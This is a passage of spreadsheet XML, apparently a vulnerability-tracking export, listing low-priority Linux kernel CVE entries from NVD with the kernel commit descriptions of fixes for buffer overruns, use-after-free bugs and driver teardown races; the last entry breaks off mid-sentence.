      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93067</t>
        </is>
      </c>
      <c r="D885" s="5" t="inlineStr"/>
      <c r="E885" s="5" t="inlineStr"/>
      <c r="F885" s="5" t="inlineStr"/>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="inlineStr"/>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q885" s="5" t="inlineStr"/>
      <c r="R885" s="5" t="inlineStr"/>
      <c r="S885" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/bridge: tc358767: clamp the reported AUX read size to the request
tc_aux_transfer() clamps an AUX read to the payload limit:
	size_t size = min_t(size_t, DP_AUX_MAX_PAYLOAD_BYTES - 1, msg-&gt;size);
After the transfer it replaces size with the byte count the controller
reports in AUX_BYTES:
	if (size)
		size = FIELD_GET(AUX_BYTES, auxstatus);
AUX_BYTES is GENMASK(15, 8), so it can be up to 255. Nothing clamps it
back to the request. tc_aux_read_data() reads that many bytes into the
16-byte auxrdata stack buffer, then copies them into the caller buffer. A
reported count of 255 makes the read run to 256 bytes and overruns both.
The controller should never report more than it was asked to transfer, so
this is defense in depth rather than a live hole. The reported count is
only lightly trusted, and the check is cheap. Clamp it back to the request,
the same way ti-sn65dsi86 does in commit aca58eac52b8 ("drm/bridge:
ti-sn65dsi86: Never store more than msg-&gt;size bytes in AUX xfer").</t>
        </is>
      </c>
      <c r="T885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93067</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93068</t>
        </is>
      </c>
      <c r="D886" s="5" t="inlineStr"/>
      <c r="E886" s="5" t="inlineStr"/>
      <c r="F886" s="5" t="inlineStr"/>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="inlineStr"/>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q886" s="5" t="inlineStr"/>
      <c r="R886" s="5" t="inlineStr"/>
      <c r="S886" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix DM I2C teardown race
DM I2C adapters can remain visible to userspace while DM teardown is
already in progress. A concurrent i2c-dev transfer may then enter
amdgpu_dm_i2c_xfer() after the backing DM state has been torn down,
leading to a NULL pointer dereference.
Create a devres group around the DM I2C adapter lifetime and release it
at the start of dm_hw_fini(), before HPD, IRQ, and DM state are torn
down. This removes the I2C adapters first and waits for in-flight users
to drain before the structures used by amdgpu_dm_i2c_xfer() disappear.
This fixes a teardown ordering race seen during device removal:
BUG: kernel NULL pointer dereference
RIP: amdgpu_dm_i2c_xfer+0x122/0x1c0 [amdgpu]
Call Trace:
__i2c_transfer
i2c_transfer
i2cdev_ioctl_rdwr</t>
        </is>
      </c>
      <c r="T886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93068</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93069</t>
        </is>
      </c>
      <c r="D887" s="5" t="inlineStr"/>
      <c r="E887" s="5" t="inlineStr"/>
      <c r="F887" s="5" t="inlineStr"/>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="inlineStr"/>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr"/>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q887" s="5" t="inlineStr"/>
      <c r="R887" s="5" t="inlineStr"/>
      <c r="S887" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
OPP: Fix cleanup ordering
Commit 173e02d67494 ("OPP: Initialize scope-based pointers inline")
added initialization for all pointers. In some cases, the ordering was
changed so that *opp_table was initialized after *opp. This also changes
the order of the registered cleanup functions.
When the cleanup happens, this can cause use-after-free errors when the
last reference is released and the release function _opp_kref_release
tries to access the already freed opp-&gt;opp_table.
Initialize *opp_table before *opp again to fix this and ensure the
correct cleanup order.</t>
        </is>
      </c>
      <c r="T887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93069</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93070</t>
        </is>
      </c>
      <c r="D888" s="5" t="inlineStr"/>
      <c r="E888" s="5" t="inlineStr"/>
      <c r="F888" s="5" t="inlineStr"/>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="inlineStr"/>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr"/>
      <c r="L888" s="5" t="inlineStr"/>
      <c r="M888" s="5" t="inlineStr"/>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O888" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P888" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q888" s="5" t="inlineStr"/>
      <c r="R888" s="5" t="inlineStr"/>
      <c r="S888" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: ipu6: Do not free aux device pdata after init
ipu6_bus_initialize_device() stores the isys/psys pdata pointer in
struct ipu6_bus_device and initializes the auxiliary device. After that
point, error unwinding must drop the auxiliary device reference and let
ipu6_bus_release() free both the bus device and adev-&gt;pdata.
The isys and psys init paths already call put_device() when MMU
initialization fails, and ipu6_bus_add_device() calls
auxiliary_device_uninit() on auxiliary_device_add() failure. Both paths
therefore run the bus release callback. The extra kfree(pdata) in the
callers can release the same object a second time.
Remove the manual pdata frees after the auxiliary device has been
initialized.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="T888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93070</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93071</t>
        </is>
      </c>
      <c r="D889" s="5" t="inlineStr"/>
      <c r="E889" s="5" t="inlineStr"/>
      <c r="F889" s="5" t="inlineStr"/>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="inlineStr"/>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr"/>
      <c r="L889" s="5" t="inlineStr"/>
      <c r="M889" s="5" t="inlineStr"/>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q889" s="5" t="inlineStr"/>
      <c r="R889" s="5" t="inlineStr"/>
      <c r="S889" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: bcm2835-unicam: Fix asc leaked in error/remove path
v4l2_async_nf_add_fwnode_remote() allocates the asc, which is freed when
v4l2_async_nf_cleanup() is called.
Call v4l2_async_nf_cleanup() properly in the driver paths.
Discovered with kmemleak after rmmod:
unreferenced object 0xffff000084526b80 (size 64):
  comm "modprobe", pid 185, jiffies 4295013512
  hex dump (first 32 bytes):
    01 00 00 00 00 00 00 00 e8 0d ff bf 00 00 ff ff  ................
    40 83 bc 84 00 00 ff ff 60 83 bc 84 00 00 ff ff  @.......`.......
  backtrace (crc ac584083):
    [&lt;00000000ffb081a7&gt;] kmemleak_alloc+0x38/0x44
    [&lt;00000000d2fd9301&gt;] __kmalloc+0x1b0/0x250
    [&lt;000000004dd5354d&gt;] __v4l2_async_nf_add_fwnode+0x28/0x9c
    [&lt;0000000067587657&gt;] __v4l2_async_nf_add_fwnode_remote+0x3c/0x64</t>
        </is>
      </c>
      <c r="T889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93071</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93072</t>
        </is>
      </c>
      <c r="D890" s="5" t="inlineStr"/>
      <c r="E890" s="5" t="inlineStr"/>
      <c r="F890" s="5" t="inlineStr"/>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="inlineStr"/>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr"/>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q890" s="5" t="inlineStr"/>
      <c r="R890" s="5" t="inlineStr"/>
      <c r="S890" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/renesas-irqc: Fix generic interrupt chip leak on remove
The driver allocates domain generic chips probe. However, on driver
removal, the generic chips are not automatically freed when the interrupt
domain is removed because the domain flags do not include
IRQ_DOMAIN_FLAG_DESTROY_GC.
This causes both the domain generic chips structure and the associated
generic chips to be leaked. Additionally, the generic chips remain on the
global list and may later be accessed by generic interrupt chip suspend,
resume, or shutdown callbacks after the driver has been removed,
potentially resulting in a use-after-free and kernel crash.
Fix the resource leak by setting IRQ_DOMAIN_FLAG_DESTROY_GC on the
interrupt domain; this lets the interrupt domain core automatically
release all generic chips when irq_domain_remove() is invoked, removing
the need for manual cleanup calls in error paths and remove callback.</t>
        </is>
      </c>
      <c r="T890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93072</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93073</t>
        </is>
      </c>
      <c r="D891" s="5" t="inlineStr"/>
      <c r="E891" s="5" t="inlineStr"/>
      <c r="F891" s="5" t="inlineStr"/>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="inlineStr"/>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr"/>
      <c r="L891" s="5" t="inlineStr"/>
      <c r="M891" s="5" t="inlineStr"/>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q891" s="5" t="inlineStr"/>
      <c r="R891" s="5" t="inlineStr"/>
      <c r="S891" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax: read holder_ops once in dax_holder_notify_failure()
dax_holder_notify_failure() reads dax_dev-&gt;holder_ops twice without
READ_ONCE() -- once for the NULL check and once for the indirect
notify_failure() call. A concurrent fs_put_dax() can clear holder_ops
between the two reads, so the check can observe a non-NULL pointer while
the call dereferences NULL. (kill_dax() also clears holder_ops, but only
after synchronize_srcu(), so it cannot race a reader that is inside
dax_read_lock(); fs_put_dax() does no such synchronization.)
Fetch holder_ops once into a local with READ_ONCE() so the NULL check and
the indirect call observe the same value.</t>
        </is>
      </c>
      <c r="T891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93073</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93074</t>
        </is>
      </c>
      <c r="D892" s="5" t="inlineStr"/>
      <c r="E892" s="5" t="inlineStr"/>
      <c r="F892" s="5" t="inlineStr"/>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="inlineStr"/>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr"/>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q892" s="5" t="inlineStr"/>
      <c r="R892" s="5" t="inlineStr"/>
      <c r="S892" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax/fsdev: use __va(phys) for kaddr in direct_access
Use __va(phys) instead of virt_addr + linear_offset for the kaddr
return in __fsdev_dax_direct_access(). The previous code added a
device-linear byte offset to virt_addr (which is __va of ranges[0]),
but for multi-range devices with physical gaps between ranges, this
linear arithmetic crosses the gap and produces a wrong kernel virtual
address. Using __va(phys) where phys comes from dax_pgoff_to_phys()
is correct for any range layout because the direct map translates
each physical address independently.
This leaves dev_dax-&gt;virt_addr write-only, so remove the field
(suggested by Dave Jiang).</t>
        </is>
      </c>
      <c r="T892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93074</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93075</t>
        </is>
      </c>
      <c r="D893" s="5" t="inlineStr"/>
      <c r="E893" s="5" t="inlineStr"/>
      <c r="F893" s="5" t="inlineStr"/>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="inlineStr"/>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr"/>
      <c r="L893" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q893" s="5" t="inlineStr"/>
      <c r="R893" s="5" t="inlineStr"/>
      <c r="S893" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax/fsdev: clear pgmap ops and owner on unbind
fsdev_dax_probe() sets pgmap-&gt;ops = &amp;fsdev_pagemap_ops and
pgmap-&gt;owner = dev_dax, but nothing ever clears them. For a dynamic
device the pgmap is devm-allocated and freed on unbind, so this is
harmless. For a static device the pgmap is the shared, long-lived one
owned by the dax bus (kill_dev_dax() only NULLs dev_dax-&gt;pgmap for the
non-static case), and device.c's probe sets only pgmap-&gt;type, never
clearing ops/owner.
So after fsdev unbinds a static device the stale fsdev_pagemap_ops
survives on the shared pgmap. If the device is then rebound to
device_dax (MEMORY_DEVICE_GENERIC, which installs no -&gt;memory_failure),
or the fsdev_dax module is unloaded, a subsequent memory_failure on that
pgmap dispatches through the stale -- and possibly freed -- handler.
Register a devm action that clears pgmap-&gt;ops and pgmap-&gt;owner on unbind,
symmetric with setting them at probe, so the pgmap carries no fsdev state
once fsdev is detached.</t>
        </is>
      </c>
      <c r="T893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93075</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93076</t>
        </is>
      </c>
      <c r="D894" s="5" t="inlineStr"/>
      <c r="E894" s="5" t="inlineStr"/>
      <c r="F894" s="5" t="inlineStr"/>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="inlineStr"/>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr"/>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q894" s="5" t="inlineStr"/>
      <c r="R894" s="5" t="inlineStr"/>
      <c r="S894" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax/fsdev: clear vmemmap_shift when binding static pgmap
Clear pgmap-&gt;vmemmap_shift for static DAX devices. When rebinding a static
device from device_dax (which may set vmemmap_shift based on alignment) to
fsdev_dax, the stale vmemmap_shift persists on the shared pgmap. Explicitly
zero it before devm_memremap_pages() so the vmemmap is built for order-0
folios as fsdev requires.</t>
        </is>
      </c>
      <c r="T894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93076</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93077</t>
        </is>
      </c>
      <c r="D895" s="5" t="inlineStr"/>
      <c r="E895" s="5" t="inlineStr"/>
      <c r="F895" s="5" t="inlineStr"/>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="inlineStr"/>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr"/>
      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q895" s="5" t="inlineStr"/>
      <c r="R895" s="5" t="inlineStr"/>
      <c r="S895" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Clamp Get Feature output size to the remaining buffer
cxl_get_feature() reads a feature in a loop but passes a fixed size_out
as the output capacity every iteration. On the last partial iteration
the buffer has less room left, so a device that returns more than asked
can overflow feat_out.
Use the per-iter size data_to_rd_size, which already tracks the
remaining room, as the output capacity.</t>
        </is>
      </c>
      <c r="T895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93077</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93078</t>
        </is>
      </c>
      <c r="D896" s="5" t="inlineStr"/>
      <c r="E896" s="5" t="inlineStr"/>
      <c r="F896" s="5" t="inlineStr"/>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="inlineStr"/>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr"/>
      <c r="L896" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q896" s="5" t="inlineStr"/>
      <c r="R896" s="5" t="inlineStr"/>
      <c r="S896" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Reject Set Features output buffer smaller than the header
cxlctl_set_feature() sizes its output buffer from the user's
fwctl_rpc.out_len but never checks it is large enough to hold even the
fwctl_rpc_cxl_out header. With out_len == 0 , kvzalloc() returns
ZERO_SIZE_PTR, which passes the !rpc_out check, the subsequent
rpc_out-&gt;size = 0 then writes through the poison pointer.
Reject requests whose output buffer can't hold the response header,
before allocating. The Set Feature reply carries no payload, so the
header is all that is required.</t>
        </is>
      </c>
      <c r="T896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93078</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93079</t>
        </is>
      </c>
      <c r="D897" s="5" t="inlineStr"/>
      <c r="E897" s="5" t="inlineStr"/>
      <c r="F897" s="5" t="inlineStr"/>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="inlineStr"/>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr"/>
      <c r="L897" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q897" s="5" t="inlineStr"/>
      <c r="R897" s="5" t="inlineStr"/>
      <c r="S897" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Reject Get Feature count larger than the output buffer
cxlctl_get_feature() sizes its output buffer from the user's
fwctl_rpc.out_len, but the device is told to write
cxl_mbox_get_feat_in.count bytes into rpc_out-&gt;payload, which is a
separate user-controlled value. Nothing bounds count against out_len, so
a small out_len with a large count overflows the kvzalloc()'d buffer.
A heap OOB write reachable from FWCTL_RPC.
Reject requests where count exceeds the available payload room, before
allocating.</t>
        </is>
      </c>
      <c r="T897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93079</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93080</t>
        </is>
      </c>
      <c r="D898" s="5" t="inlineStr"/>
      <c r="E898" s="5" t="inlineStr"/>
      <c r="F898" s="5" t="inlineStr"/>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="inlineStr"/>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr"/>
      <c r="L898" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q898" s="5" t="inlineStr"/>
      <c r="R898" s="5" t="inlineStr"/>
      <c r="S898" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Fix transport device teardown lookup
SCMI transport devices are deliberately excluded from normal SCMI bus
matching so protocol drivers cannot bind to the internal transport
children. However, scmi_device_destroy() uses the same protocol/name
lookup to find devices that must be unregistered during channel teardown.
Split the match helper so driver matching still skips transport devices,
while explicit child lookup can find them for teardown. Use a shared
transport-device name prefix macro for both matching and name generation.
Since transport-device names are derived from direction and protocol ID,
reject duplicate protocol channel setup before creating or finding a
transport device. This prevents malformed firmware with duplicate
protocol child nodes from reusing an existing transport device and then
destroying it when the duplicate IDR insertion fails.</t>
        </is>
      </c>
      <c r="T898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93080</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93081</t>
        </is>
      </c>
      <c r="D899" s="5" t="inlineStr"/>
      <c r="E899" s="5" t="inlineStr"/>
      <c r="F899" s="5" t="inlineStr"/>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="inlineStr"/>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr"/>
      <c r="L899" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q899" s="5" t="inlineStr"/>
      <c r="R899" s="5" t="inlineStr"/>
      <c r="S899" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Fix SCMI device destroy lifetimes
scmi_child_dev_find() drops the reference returned by
device_find_child() before returning the scmi_device pointer. A
concurrent unregister can then release the device while the destroy path
is still using the returned pointer.
Make the lookup helper return the device_find_child() reference and keep
